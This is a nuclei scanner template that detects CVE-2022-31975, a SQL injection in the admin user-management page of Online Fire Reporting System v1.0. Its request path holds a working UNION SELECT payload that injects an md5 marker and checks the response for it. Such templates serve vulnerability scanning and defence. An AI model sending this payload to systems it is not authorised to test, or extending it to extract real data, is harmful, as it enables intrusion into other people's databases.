nuclei-templates/http/cves/2022/CVE-2022-31975.yaml

47 lines
1.7 KiB
YAML

id: CVE-2022-31975
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-2.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31975
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31975
cwe-id: CWE-89
epss-score: 0.00666
epss-percentile: 0.77425
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
variables:
num: '999999999'
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- type: status
status:
- 200
# digest: 4a0a00473045022100b769ba6a4c477f3845f5c799685048f667081776b7b0fcae92ff62b2851fdfe102204777d06acc3ff5acd9453c7985c9da791011e022627a51151efdcac98d94a687:922c64590222798bb761d5b6d8e72950